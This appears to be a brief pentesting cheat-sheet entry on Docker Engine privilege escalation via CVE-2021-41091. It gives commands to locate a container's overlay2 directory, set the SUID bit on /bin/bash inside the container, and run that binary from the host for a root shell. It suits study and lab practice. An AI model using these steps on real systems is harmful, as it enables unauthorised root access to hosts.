Moby Docker Engine PrivEsc
Last modified: 2023-05-02
Container Privilege Escalation
Directory Traversal & Arbitrary Command Execution (CVE-2021-41091 )
1. Find Docker Container Directory
First off, find the directory which the docker container mounted
findmnt # Results e.g. /var/lib/docker/overlay2/abcdef...xyz/merged
Assume the directory above found, we can investigate in the directory.
ls -la /var/lib/docker/overlay2/abcdef...xyz/merged/
2. Prepare SUID Binary in Container
If we can be root in the docker container, set uid arbitrary binary as below. Please note that we need to do that in the container, not the real host.
chmod u+s /bin/bash
3. Execute the SUID Binary in Real Host
Back to the real host machine again, execute the binary which we set uid to privilege escalation.
We should get a root shell.